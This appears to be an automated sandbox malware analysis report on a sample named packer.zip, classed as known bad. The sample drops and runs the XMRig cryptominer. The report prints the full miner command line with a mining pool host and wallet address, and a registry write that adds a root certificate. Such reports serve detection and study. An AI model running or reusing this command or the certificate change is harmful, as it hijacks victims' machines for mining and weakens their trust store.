Malware Analysis Report

2024-11-16 10:59

Sample ID 240614-fvzzbswejb
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

XMRig Miner payload

xmrig

Executes dropped EXE

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 05:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1789s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2684-14-0x000002135EAF0000-0x000002135EB10000-memory.dmp

memory/2684-15-0x000002135EB40000-0x000002135EB60000-memory.dmp

memory/2684-16-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-17-0x000002135EB60000-0x000002135EB80000-memory.dmp

memory/2684-18-0x000002135EB80000-0x000002135EBA0000-memory.dmp

memory/2684-19-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-20-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-23-0x000002135EB80000-0x000002135EBA0000-memory.dmp

memory/2684-22-0x000002135EB60000-0x000002135EB80000-memory.dmp

memory/2684-21-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-24-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-25-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-26-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-27-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-28-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-29-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-30-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-31-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-32-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-33-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-34-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-35-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-36-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-37-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-38-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-39-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-40-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-41-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-42-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-43-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-44-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-45-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-46-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-47-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-48-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-49-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-50-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-51-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-52-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-53-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-54-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-55-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-56-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-57-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-58-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-59-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-60-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-61-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-62-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-63-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-64-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-65-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-66-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-67-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-68-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-69-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-70-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-71-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-72-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-73-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-74-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-75-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-76-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-77-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-78-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-79-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-80-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-81-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

memory/2684-82-0x00007FF70EFD0000-0x00007FF70FAD3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:48

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4540,i,8660989700097327804,17931739887231169645,262144 --variations-seed-version --mojo-platform-channel-handle=2708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4192,i,8660989700097327804,17931739887231169645,262144 --variations-seed-version --mojo-platform-channel-handle=4844 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4552-14-0x0000020CA05D0000-0x0000020CA05F0000-memory.dmp

memory/4552-15-0x0000020CA1DE0000-0x0000020CA1E00000-memory.dmp

memory/4552-16-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-18-0x0000020CA1E00000-0x0000020CA1E20000-memory.dmp

memory/4552-17-0x0000020CA1E20000-0x0000020CA1E40000-memory.dmp

memory/4552-19-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-20-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-21-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-23-0x0000020CA1E00000-0x0000020CA1E20000-memory.dmp

memory/4552-22-0x0000020CA1E20000-0x0000020CA1E40000-memory.dmp

memory/4552-24-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-25-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-26-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-27-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-28-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-29-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-30-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-31-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-32-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-33-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-34-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-35-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-36-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-37-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-38-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-39-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-40-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-41-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-42-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-43-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-44-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-45-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-46-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-47-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-48-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-49-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-50-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-51-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-52-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-53-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-54-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-55-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-56-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-57-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-58-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

